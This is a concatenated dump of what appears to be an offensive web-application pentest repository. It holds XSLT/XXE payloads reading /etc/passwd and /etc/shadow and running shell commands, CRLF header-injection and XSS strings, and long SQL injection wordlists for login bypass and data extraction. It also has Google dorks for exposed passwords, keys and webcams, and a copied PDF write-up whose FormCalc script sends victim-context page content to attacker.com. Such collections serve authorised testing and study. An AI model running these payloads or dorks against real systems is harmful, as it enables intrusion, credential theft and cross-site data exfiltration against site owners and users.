match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 39 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> 40 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> 41 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 42 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 43 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 44 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 45 | <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 46 | <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://127.0.0.1:80/?%file;'> "> %int; 47 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 48 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 49 | -------------------------------------------------------------------------------- /Web Application/CRLF Injection/README.md: -------------------------------------------------------------------------------- 1 | # CRLF 2 | 3 | The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, \\n). 4 | 5 | They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. 6 | 7 | A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 8 | 9 | ## Summary 10 | - [Tools](#tools) 11 | - [Response Header Injection](#response-header-injection) 12 | - [CRLF - Add a cookie](#crlf---add-a-cookie) 13 | - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) 14 | - [CRLF - Write HTML](#crlf---write-html) 15 | - [CRLF - Filter Bypass](#crlf---filter-bypass) 16 | 17 | ## Tools 18 | 19 | - [crlfuzz](https://github.com/dwisiswant0/crlfuzz) 20 | 21 | ## Response Header Injection 22 | 23 | Si visualiza algún valor reflejado en la RESPONSE del servidor que puede manipular y fue inyectado en la REQUEST: 24 | ``` 25 | HTTP/1.1 200 OK 26 | ... 27 | Set-Cookie: author=ValorManipulado 28 | Location: http://google.com/fichero.jsp?lang=English 29 | ... 30 | ``` 31 | 32 | Modifique e ingrese en su REQUEST un carriage return y line feed: 33 | 34 | Si la respuesta ORIGINAL da una redirección 301,302: 35 | 36 | ``` 37 | http://google.com/fichero.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> 38 | ``` 39 | 40 | Si la respuesta ORIGINAL da 200 OK: 41 | ``` 42 | Set-Cookie: author=CGonzalo\r\nContent-Length:19\r\n\r\n<html>Shazam</html> 43 | ``` 44 | 45 | ``` 46 | Set-Cookie: author=CGonzalo%0d%0aContent-Length:19%0d%0a%0d%0a<html>Shazam</html> 47 | ``` 48 | 49 | *NOTA: El header "Content-Lenght: `[value]` debe coincidir con el HTML malicioso inyectado.* 50 | 51 | ## CRLF - Add a cookie 52 | 53 | Requested page: 54 | ``` 55 | http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue 56 | ``` 57 | 58 | HTTP Response: 59 | ``` 60 | Connection: keep-alive 61 | Content-Length: 178 62 | Content-Type: text/html 63 | Date: Mon, 09 May 2016 14:47:29 GMT 64 | Location: https://www.example.net/[INJECTION STARTS HERE] 65 | Set-Cookie: mycookie=myvalue 66 | X-Frame-Options: SAMEORIGIN 67 | X-Sucuri-ID: 15016 68 | x-content-type-options: nosniff 69 | x-xss-protection: 1; mode=block 70 | ``` 71 | 72 | ## CRLF - Add a cookie - XSS Bypass 73 | 74 | Requested page: 75 | ``` 76 | http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e 77 | ``` 78 | 79 | HTTP Response: 80 | ``` 81 | HTTP/1.1 200 OK 82 | Date: Tue, 20 Dec 2016 14:34:03 GMT 83 | Content-Type: text/html; charset=utf-8 84 | Content-Length: 22907 85 | Connection: close 86 | X-Frame-Options: SAMEORIGIN 87 | Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT 88 | ETag: "842fe-597b-54415a5c97a80" 89 | Vary: Accept-Encoding 90 | X-UA-Compatible: IE=edge 91 | Server: NetDNA-cache/2.2 92 | Link: <https://example.com/[INJECTION STARTS HERE] 93 | Content-Length:35 94 | X-XSS-Protection:0 95 | 96 | 23 97 | <svg onload=alert(document.domain)> 98 | 0 99 | ``` 100 | 101 | ## CRLF - Write HTML 102 | 103 | Requested page: 104 | ``` 105 | http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E 106 | ``` 107 | 108 | HTTP response: 109 | ``` 110 | Set-Cookie:en 111 | Content-Length: 0 112 | 113 | HTTP/1.1 200 OK 114 | Content-Type: text/html 115 | Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT 116 | Content-Length: 34 117 | 118 | <html>You have been Phished</html> 119 | ``` 120 | 121 | ## CRLF - Filter Bypass 122 | 123 | Using UTF-8 encoding 124 | 125 | ``` 126 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE 127 | ``` 128 | 129 | #### Remainder: 130 | 131 | - %E5%98%8A = %0A = \\u560a 132 | - %E5%98%8D = %0D = \\u560d 133 | - %E5%98%BE = %3E = \\u563e (>) 134 | - %E5%98%BC = %3C = \\u563c (<) 135 | 136 | ## Exploitation Tricks 137 | 138 | - Try to search for parameters that lead to redirects and fuzz them. 139 | - Also test the mobile version of the website, sometimes it is different or uses a different backend. 140 | 141 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Auth_Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or 1=1 limit 1 -- -+ 7 | '="or' 8 | ' or ''-' 9 | ' or '' ' 10 | ' or ''&' 11 | ' or ''^' 12 | ' or ''*' 13 | '-||0' 14 | "-||0" 15 | "-" 16 | " " 17 | "&" 18 | "^" 19 | "*" 20 | '--' 21 | "--" 22 | '--' / "--" 23 | " or ""-" 24 | " or "" " 25 | " or ""&" 26 | " or ""^" 27 | " or ""*" 28 | or true-- 29 | " or true-- 30 | ' or true-- 31 | ") or true-- 32 | ') or true-- 33 | ' or 'x'='x 34 | ') or ('x')=('x 35 | ')) or (('x'))=(('x 36 | " or "x"="x 37 | ") or ("x")=("x 38 | ")) or (("x"))=(("x 39 | or 2 like 2 40 | or 1=1 41 | or 1=1-- 42 | or 1=1# 43 | or 1=1/* 44 | admin' -- 45 | admin' -- - 46 | admin' # 47 | admin'/* 48 | admin' or '2' LIKE '1 49 | admin' or 2 LIKE 2-- 50 | admin' or 2 LIKE 2# 51 | admin') or 2 LIKE 2# 52 | admin') or 2 LIKE 2-- 53 | admin') or ('2' LIKE '2 54 | admin') or ('2' LIKE '2'# 55 | admin') or ('2' LIKE '2'/* 56 | admin' or '1'='1 57 | admin' or '1'='1'-- 58 | admin' or '1'='1'# 59 | admin' or '1'='1'/* 60 | admin'or 1=1 or ''=' 61 | admin' or 1=1 62 | admin' or 1=1-- 63 | admin' or 1=1# 64 | admin' or 1=1/* 65 | admin') or ('1'='1 66 | admin') or ('1'='1'-- 67 | admin') or ('1'='1'# 68 | admin') or ('1'='1'/* 69 | admin') or '1'='1 70 | admin') or '1'='1'-- 71 | admin') or '1'='1'# 72 | admin') or '1'='1'/* 73 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 74 | admin" -- 75 | admin';-- azer 76 | admin" # 77 | admin"/* 78 | admin" or "1"="1 79 | admin" or "1"="1"-- 80 | admin" or "1"="1"# 81 | admin" or "1"="1"/* 82 | admin"or 1=1 or ""=" 83 | admin" or 1=1 84 | admin" or 1=1-- 85 | admin" or 1=1# 86 | admin" or 1=1/* 87 | admin") or ("1"="1 88 | admin") or ("1"="1"-- 89 | admin") or ("1"="1"# 90 | admin") or ("1"="1"/* 91 | admin") or "1"="1 92 | admin") or "1"="1"-- 93 | admin") or "1"="1"# 94 | admin") or "1"="1"/* 95 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 96 | --/-- 97 | '--'/"--" 98 | "--"/'--' 99 | administrator'-- 100 | OR 1=1 -- 101 | ' OR 2=2 -- 102 | ") OR 1=1 -- 103 | ') OR 1=1 -- 104 | admin== 105 | administrator== 106 | admin'- 107 | 'or''=' 108 | ' or 1=1 LIMIT 1 -- 109 | ' or 1=1 LIMIT 1 -- - 110 | ' or 1=1 LIMIT 1# 111 | 'or 1# 112 | ' or 1=1 -- 113 | ' or 1=1 -- - 114 | ' or 1=1# 115 | " OR "1"="1 116 | == 117 | = 118 | ' 119 | ' -- 120 | ' # 121 | ' – 122 | '-- 123 | '/* 124 | '# 125 | " -- 126 | " # 127 | "/* 128 | ' and 1='1 129 | ' and a='a 130 | or 1=1 131 | or true 132 | ' or ''=' 133 | " or ""=" 134 | 1′) and '1′='1– 135 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 136 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 137 | and 1=1 138 | and 1=1– 139 | ' and 'one'='one 140 | ' and 'one'='one– 141 | ' group by password having 1=1-- 142 | ' group by userid having 1=1-- 143 | ' group by username having 1=1-- 144 | like '%' 145 | or 0=0 -- 146 | or 0=0 # 147 | or 0=0 – 148 | ' or 0=0 # 149 | ' or 0=0 -- 150 | ' or 0=0 # 151 | ' or 0=0 – 152 | " or 0=0 -- 153 | " or 0=0 # 154 | " or 0=0 – 155 | %' or '0'='0 156 | or 1=1 157 | or 1=1-- 158 | or 1=1/* 159 | or 1=1# 160 | or 1=1– 161 | ' or 1=1-- 162 | ' or '1'='1 163 | ' or '1'='1'-- 164 | ' or '1'='1'/* 165 | ' or '1'='1'# 166 | ' or '1′='1 167 | ' or 1=1 168 | ' or 1=1 -- 169 | ' or 1=1 – 170 | ' or 1=1-- 171 | ' or 1=1;# 172 | ' or 1=1/* 173 | ' or 1=1# 174 | ' or 1=1– 175 | ') or '1'='1 176 | ') or '1'='1-- 177 | ') or '1'='1'-- 178 | ') or '1'='1'/* 179 | ') or '1'='1'# 180 | ') or ('1'='1 181 | ') or ('1'='1-- 182 | ') or ('1'='1'-- 183 | ') or ('1'='1'/* 184 | ') or ('1'='1'# 185 | 'or'1=1 186 | 'or'1=1′ 187 | " or "1"="1 188 | " or "1"="1"-- 189 | " or "1"="1"/* 190 | " or "1"="1"# 191 | " or 1=1 192 | " or 1=1 -- 193 | " or 1=1 – 194 | " or 1=1-- 195 | " or 1=1/* 196 | " or 1=1# 197 | " or 1=1– 198 | ") or "1"="1 199 | ") or "1"="1"-- 200 | ") or "1"="1"/* 201 | ") or "1"="1"# 202 | ") or ("1"="1 203 | ") or ("1"="1"-- 204 | ") or ("1"="1"/* 205 | ") or ("1"="1"# 206 | ) or '1′='1– 207 | ) or ('1′='1– 208 | ' or 1=1 LIMIT 1;# 209 | 'or 1=1 or ''=' 210 | "or 1=1 or ""=" 211 | ' or 'a'='a 212 | ' or a=a-- 213 | ' or a=a– 214 | ') or ('a'='a 215 | " or "a"="a 216 | ") or ("a"="a 217 | ') or ('a'='a and hi") or ("a"="a 218 | ' or 'one'='one 219 | ' or 'one'='one– 220 | ' or uid like '% 221 | ' or uname like '% 222 | ' or userid like '% 223 | ' or user like '% 224 | ' or username like '% 225 | ' or 'x'='x 226 | ') or ('x'='x 227 | " or "x"="x 228 | ' OR 'x'='x'#; 229 | '=' 'or' and '=' 'or' 230 | ' UNION ALL SELECT 1, @@version;# 231 | ' UNION ALL SELECT system_user(),user();# 232 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 233 | admin' and substring(password/text(),1,1)='7 234 | ' and substring(password/text(),1,1)='7 235 | ' or 1=1 limit 1 -- -+ 236 | '="or' 237 | -------------------------------------------------------------------------------- /Web Application/Dorks/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | - [Google Dorks](#google-dorks) 4 | - [Github Dorks](#github-dorks) 5 | - [Shodan](#shodan) 6 | - [ESI Detection](#esi-detection) 7 | 8 | ## Google Dorks 9 | 10 | #### TOP 5 11 | Top 5 Google dorks for identifying interesting and potentially sensitive information about your target (example.com) 12 | ``` 13 | inurl:example.com intitle:"index of" 14 | ``` 15 | ``` 16 | inurl:example.com intitle:"index of /" "*key.pem" 17 | ``` 18 | ``` 19 | inurl:example.com ext:log 20 | ``` 21 | ``` 22 | inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 23 | ``` 24 | ``` 25 | inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 26 | ``` 27 | ``` 28 | example.com "password" 29 | ``` 30 | 31 | #### CACHE 32 | This dork will show you the cached version of any website: 33 | ``` 34 | cache:example.com 35 | ``` 36 | 37 | #### ALLINTEXT 38 | Searches for specific text contained on any web page: 39 | ``` 40 | site:example.com allintext:hacking 41 | ``` 42 | 43 | #### ALLINURL 44 | It can be used to fetch results whose URL contains all the specified characters: 45 | ``` 46 | allinurl:admin site:example.com 47 | allinurl:clientarea site:example.com 48 | ``` 49 | 50 | #### INURL 51 | This is exactly the same as `allinurl`, but it is only useful for one single keyword: 52 | ``` 53 | domainexample inurl:admin 54 | inurl:/proc/self/cwd (Google Dork can be used to detect vulnerable servers | /proc/self/cwd es equivalente al directorio actual) 55 | site:.edu filetype:xls inurl:"email.xls" (find email lists) 56 | inurl:top.htm inurl:currenttime (webcam) 57 | inurl:"lvappl.htm" (webcam) 58 | inurl:zoom.us/j and intext:scheduled for (zoom calls) 59 | "Index of" inurl:phpmyadmin (phpmyadmin panel) 60 | inurl:_cpanel/forgotpwd (cPanel password reset) 61 | ``` 62 | 63 | #### FILETYPE 64 | Used to search for any kind of file extensions, for example, if you want to search for `pdf` files you can us: 65 | ``` 66 | allintext:username filetype:log 67 | example.com filetype:pdf 68 | example.com filetype:log 69 | manual filetype:pdf 70 | allintext:"APP_ENV" OR "APP*" filetype:env (.env files are the ones used by popular web development frameworks to declare general variables and configurations for local and online dev environments.) 71 | filetype:log username putty (find SSH private keys) 72 | allintitle: restricted filetype:doc site:gov (Government documents) 73 | ``` 74 | 75 | #### INTITLE 76 | Used to search for various keywords inside the title, for example `intitle:security tools` will search for titles beginning with “security” but “tools” can be somewhere else in the page: 77 | ``` 78 | intitle:security tools 79 | intitle:"index of" inurl:ftp (explore public FTP servers) 80 | intitle:"webcamXP 5" (webcam) 81 | intitle:index of pdf intext:.mp4 (legal free media files or PDF documents) 82 | intitle:"Index of" wp-admin (wordpress admin) 83 | intitle:"admin panel" OR intitle:"request password" intext:"email address" (password recovery panel) 84 | intitle:"Apache2 Ubuntu Default Page: It works" (apache2 web page) 85 | ``` 86 | 87 | #### INANCHOR 88 | This is useful when you need to search for an exact anchor text used on any links: 89 | ``` 90 | inanchor:"0xcgonzalo" 91 | ``` 92 | 93 | #### INTEXT 94 | Useful to locate pages that contain certain characters or strings inside their text: 95 | ``` 96 | intext:"0xcgonzalo" 97 | ``` 98 | 99 | #### WILCARD * 100 | Wildcard used to search pages that contain “anything” before your word: 101 | ``` 102 | how to * a website 103 | ``` 104 | 105 | #### OPERATOR | 106 | This is a logical operator, e.g. `"security"|"tips"` will show all the sites which contain “security” or “tips,” or both words 107 | ``` 108 | "security"|"tips" site:example.com 109 | ``` 110 | 111 | #### OPERATOR + 112 | Used to concatenate words, useful to detect pages that use more than one specific key: 113 | ``` 114 | security + trails 115 | ``` 116 | 117 | #### OPERATOR - 118 | Minus operator is used to avoiding showing results that contain certain words, e.g. `security -trails` will show pages that use “security” in their text, but not those that have the word “trails”: 119 | ``` 120 | security -trails site:example.com 121 | ``` 122 | 123 | #### Kibana (is a proprietary data visualization dashboard software for Elasticsearch) 124 | Kibana will return a content length of 217 if it is publicly open and one can access the dashboard without authentication: 125 | 126 | ``` 127 | inurl:app/kibana 128 | inurl:app/kibana intext:Loading Kibana 129 | inurl::5601/app/kibana 130 | kibana content-lenght: 217 (in Shodan search) 131 | inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software" 132 | ``` 133 | 134 | ## Github Dorks 135 | 136 | ``` 137 | domain.com "password" 138 | ``` 139 | 140 | ## Shodan Dorks 141 | 142 | ### ESI Detection 143 | 144 | Detectar ESI (edge-side-include-injection), en el encabezado HTTP `Surrogate-Control`. Este encabezado se utiliza para indicar a los servidores Proxies que las etiquetas ESI podrían estar presentes en la respuesta y que deben analizarse como tales: 145 | ``` 146 | Surrogate-Control: content="ESI/1.0" 147 | ``` 148 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Generic_Errors.txt: -------------------------------------------------------------------------------- 1 | OR 1=1 2 | OR 1=0 3 | OR x=x 4 | OR x=y 5 | OR 1=1# 6 | OR 1=0# 7 | OR x=x# 8 | OR x=y# 9 | OR 1=1-- 10 | OR 1=0-- 11 | OR x=x-- 12 | OR x=y-- 13 | OR 3409=3409 AND ('pytW' LIKE 'pytW 14 | OR 3409=3409 AND ('pytW' LIKE 'pytY 15 | HAVING 1=1 16 | HAVING 1=0 17 | HAVING 1=1# 18 | HAVING 1=0# 19 | HAVING 1=1-- 20 | HAVING 1=0-- 21 | AND 1=1 22 | AND 1=0 23 | AND 1=1-- 24 | AND 1=0-- 25 | AND 1=1# 26 | AND 1=0# 27 | AND 1=1 AND '%'=' 28 | AND 1=0 AND '%'=' 29 | AND 1083=1083 AND (1427=1427 30 | AND 7506=9091 AND (5913=5913 31 | AND 1083=1083 AND ('1427=1427 32 | AND 7506=9091 AND ('5913=5913 33 | AND 7300=7300 AND 'pKlZ'='pKlZ 34 | AND 7300=7300 AND 'pKlZ'='pKlY 35 | AND 7300=7300 AND ('pKlZ'='pKlZ 36 | AND 7300=7300 AND ('pKlZ'='pKlY 37 | AS INJECTX WHERE 1=1 AND 1=1 38 | AS INJECTX WHERE 1=1 AND 1=0 39 | AS INJECTX WHERE 1=1 AND 1=1# 40 | AS INJECTX WHERE 1=1 AND 1=0# 41 | AS INJECTX WHERE 1=1 AND 1=1-- 42 | AS INJECTX WHERE 1=1 AND 1=0-- 43 | WHERE 1=1 AND 1=1 44 | WHERE 1=1 AND 1=0 45 | WHERE 1=1 AND 1=1# 46 | WHERE 1=1 AND 1=0# 47 | WHERE 1=1 AND 1=1-- 48 | WHERE 1=1 AND 1=0-- 49 | ORDER BY 1-- 50 | ORDER BY 2-- 51 | ORDER BY 3-- 52 | ORDER BY 4-- 53 | ORDER BY 5-- 54 | ORDER BY 6-- 55 | ORDER BY 7-- 56 | ORDER BY 8-- 57 | ORDER BY 9-- 58 | ORDER BY 10-- 59 | ORDER BY 11-- 60 | ORDER BY 12-- 61 | ORDER BY 13-- 62 | ORDER BY 14-- 63 | ORDER BY 15-- 64 | ORDER BY 16-- 65 | ORDER BY 17-- 66 | ORDER BY 18-- 67 | ORDER BY 19-- 68 | ORDER BY 20-- 69 | ORDER BY 21-- 70 | ORDER BY 22-- 71 | ORDER BY 23-- 72 | ORDER BY 24-- 73 | ORDER BY 25-- 74 | ORDER BY 26-- 75 | ORDER BY 27-- 76 | ORDER BY 28-- 77 | ORDER BY 29-- 78 | ORDER BY 30-- 79 | ORDER BY 31337-- 80 | ORDER BY 1# 81 | ORDER BY 2# 82 | ORDER BY 3# 83 | ORDER BY 4# 84 | ORDER BY 5# 85 | ORDER BY 6# 86 | ORDER BY 7# 87 | ORDER BY 8# 88 | ORDER BY 9# 89 | ORDER BY 10# 90 | ORDER BY 11# 91 | ORDER BY 12# 92 | ORDER BY 13# 93 | ORDER BY 14# 94 | ORDER BY 15# 95 | ORDER BY 16# 96 | ORDER BY 17# 97 | ORDER BY 18# 98 | ORDER BY 19# 99 | ORDER BY 20# 100 | ORDER BY 21# 101 | ORDER BY 22# 102 | ORDER BY 23# 103 | ORDER BY 24# 104 | ORDER BY 25# 105 | ORDER BY 26# 106 | ORDER BY 27# 107 | ORDER BY 28# 108 | ORDER BY 29# 109 | ORDER BY 30# 110 | ORDER BY 31337# 111 | ORDER BY 1 112 | ORDER BY 2 113 | ORDER BY 3 114 | ORDER BY 4 115 | ORDER BY 5 116 | ORDER BY 6 117 | ORDER BY 7 118 | ORDER BY 8 119 | ORDER BY 9 120 | ORDER BY 10 121 | ORDER BY 11 122 | ORDER BY 12 123 | ORDER BY 13 124 | ORDER BY 14 125 | ORDER BY 15 126 | ORDER BY 16 127 | ORDER BY 17 128 | ORDER BY 18 129 | ORDER BY 19 130 | ORDER BY 20 131 | ORDER BY 21 132 | ORDER BY 22 133 | ORDER BY 23 134 | ORDER BY 24 135 | ORDER BY 25 136 | ORDER BY 26 137 | ORDER BY 27 138 | ORDER BY 28 139 | ORDER BY 29 140 | ORDER BY 30 141 | ORDER BY 31337 142 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 143 | RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 144 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- 145 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- 146 | %' AND 8310=8310 AND '%'=' 147 | %' AND 8310=8311 AND '%'=' 148 | and (select substring(@@version,1,1))='X' 149 | and (select substring(@@version,1,1))='M' 150 | and (select substring(@@version,2,1))='i' 151 | and (select substring(@@version,2,1))='y' 152 | and (select substring(@@version,3,1))='c' 153 | and (select substring(@@version,3,1))='S' 154 | and (select substring(@@version,3,1))='X' 155 | 1 156 | 1' 157 | 1" 158 | [1] 159 | 1` 160 | 1\ 161 | 1/*'*/ 162 | 1/*!1111'*/ 163 | 1'||'asd'||' 164 | 1' or '1'='1 165 | 1 or 1=1 166 | 'or''=' 167 | ' 168 | '' 169 | ` 170 | `` 171 | , 172 | " 173 | "" 174 | / 175 | // 176 | \ 177 | \\ 178 | ; 179 | ' or " 180 | -- or # 181 | ' OR '1 182 | ' OR 1 -- - 183 | " OR "" = " 184 | " OR 1 = 1 -- - 185 | ' OR '' = ' 186 | '=' 187 | 'LIKE' 188 | '=0--+ 189 | OR 1=1 190 | ' OR 'x'='x 191 | ' AND id IS NULL; -- 192 | '''''''''''''UNION SELECT '2 193 | %00 194 | /*…*/ 195 | + addition, concatenate (or space in url) 196 | || (double pipe) concatenate 197 | % wildcard attribute indicator 198 | @variable local variable 199 | @@variable global variable 200 | # Numeric 201 | AND 1 202 | AND 0 203 | AND true 204 | AND false 205 | 1-false 206 | 1-true 207 | 1*56 208 | -2 209 | 1' ORDER BY 1--+ 210 | 1' ORDER BY 2--+ 211 | 1' ORDER BY 3--+ 212 | 1' ORDER BY 1,2--+ 213 | 1' ORDER BY 1,2,3--+ 214 | 1' GROUP BY 1,2,--+ 215 | 1' GROUP BY 1,2,3--+ 216 | ' GROUP BY columnnames having 1=1 -- 217 | -1' UNION SELECT 1,2,3--+ 218 | ' UNION SELECT sum(columnname ) from tablename -- 219 | -1 UNION SELECT 1 INTO @,@ 220 | -1 UNION SELECT 1 INTO @,@,@ 221 | 1 AND (SELECT * FROM Users) = 1 222 | ' AND MID(VERSION(),1,1) = '5'; 223 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 224 | Finding the table name 225 | Time-Based: 226 | ,(select * from (select(sleep(10)))a) 227 | %2c(select%20*%20from%20(select(sleep(10)))a) 228 | ';WAITFOR DELAY '0:0:30'-- 229 | Comments: 230 | # Hash comment 231 | /* C-style comment 232 | -- - SQL comment 233 | ;%00 Nullbyte 234 | ` Backtick 235 | -------------------------------------------------------------------------------- /Web Application/XXE/XXE in PDF/xxe_in_pdf.md: -------------------------------------------------------------------------------- 1 | # PDF Upload - XXE and CORS bypass 2 | 3 | #### Content copied from [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html) 4 | 5 | ### Javascript function in Reader can be used to read data from external entities $CVE-2014-8452$ 6 | 7 | Status: Fixed 8 | Reality: Not Fixed 9 | 10 | This one is about a simple XXE I discovered. 11 | I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in 12 | XMLData.parse. It was possible to use external entities and reference them. 13 | I read the specification and it turns out there are more functions than "parse" to read XML. 14 | I created a simple xml file, which references an url from the same domain and parsed it with loadXML. 15 | It worked: 16 | 17 | ![](https://4.bp.blogspot.com/-is4Q5hSZk-Y/VIwdzdAckWI/AAAAAAAAACI/OAzBs9Q-T50/s1600/xxe.png) 18 | 19 | ```text 20 | 7 0 obj 21 | << 22 | /Type /Action 23 | /S /JavaScript 24 | /JS ( 25 | var cXMLDoc = '<?xml version="1.0" encoding="ISO-8859-1"?><foo>muh</foo>' 26 | var cXMLDoc2 = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY aaaa SYSTEM "http://example.com">]><ab>&aaaa;</ab>' 27 | xml = XMLData.parse(cXMLDoc,false); 28 | xml.loadXML(cXMLDoc2,false,true); 29 | ) 30 | >> 31 | endobj 32 | ``` 33 | 34 | 35 | The Impact is limited because 36 | o\) it is limited to same origin 37 | o\) HTML Pages break the xml 38 | o\) Dynamic Entities are not supported 39 | o\) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but I it didn't work. 40 | 41 | But it still can be used to read JSON. 42 | 43 | ### Same origin policy bypass in Reader $CVE-2014-8453$ 44 | 45 | Status: fixed 46 | Reality: fixed but same origin still vulnerable! 47 | 48 | In my opinion this is the most powerful vulnerability. Even without the Origin Bypass it shows you 49 | how powerful/terrifying PDF can be. 50 | Many people know that PDF supports a scripting language called Javascript but there is another one. 51 | It is mentioned in the specification for XFA, a file type also supported by the adobe reader. 52 | It is called formcalc and it not that powerful. It is used for simple math calculation. But in the adobe specification 53 | there are three additional functions: 'GET','POST' and 'PUT'. Yes, their names speak for themselves. 54 | 'GET' has one parameter: an url. It will use the browser $YEAH COOKIES$ to retrieve the url and return the content of it. 55 | We can then use 'POST' to send the return content to our own server: 56 | 57 | var content = GET$"myfriends.php"$; 58 | Post$"http://attacker.com",content$; 59 | 60 | These functions are same origin, so a website needs to allow us to upload a PDF. Thats not that unrealistic for 61 | most websites. Attacker.com is not same origin, so you need to setup a crossdomain.xml, as usual with Adobe products. 62 | 63 | To sum up: This is not a bug, this is a feature. As soon as you are allowed to upload a PDF on a website, 64 | you can access the website in the context of the user, who is viewing the PDF. Because the requests are issued 65 | by the browser, cookies are sent too. You can also use it to break any CSRF Protection by reading the tokens. 66 | 67 | ```text 68 | 69 | % a PDF file using an XFA 70 | % most whitespace can be removed (truncated to 570 bytes or so...) 71 | % Ange Albertini BSD Licence 2012 72 | 73 | % modified by insertscript 74 | 75 | %PDF-1. % can be truncated to %PDF-\0 76 | 77 | 1 0 obj <<>> 78 | stream 79 | <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> 80 | <config><present><pdf> 81 | <interactive>1</interactive> 82 | </pdf></present></config> 83 | <template> 84 | <subform name="_"> 85 | <pageSet/> 86 | <field id="Hello World!"> 87 | <event activity="initialize"> 88 | <script contentType='application/x-formcalc'> 89 | var content = GET("myfriends.php"); 90 | Post("http://attacker.com",content); 91 | </script> 92 | </event> 93 | </field> 94 | </subform> 95 | </template> 96 | </xdp:xdp> 97 | endstream 98 | endobj 99 | 100 | trailer << 101 | /Root << 102 | /AcroForm << 103 | /Fields [<< 104 | /T (0) 105 | /Kids [<< 106 | /Subtype /Widget 107 | /Rect [] 108 | /T () 109 | /FT /Btn 110 | >>] 111 | >>] 112 | /XFA 1 0 R 113 | >> 114 | /Pages <<>> 115 | >> 116 | >> 117 | 118 | 119 | ``` 120 | 121 | 122 | After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser 123 | as a proxy $@beef still working on the module^^$ 124 | 125 | The bypass is really simple: 126 | 127 | 1. User A loads evil.pdf from http://attacker.com/evil.pdf 128 | 2. Evil.pdf uses formcalc GET to read http://attacker.com/redirect.php 129 | 3. redirect.php redirects with 301 to http://facebook.com 130 | 4. Adobe reader will follow and read the response without looking for a crossdomain.xml. 131 | 5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php 132 | 133 | Note that using this technique you can steal the CRSF tokens of a page and abuse CSRF vulns. 134 | 135 | This simple bypass is fixed now. 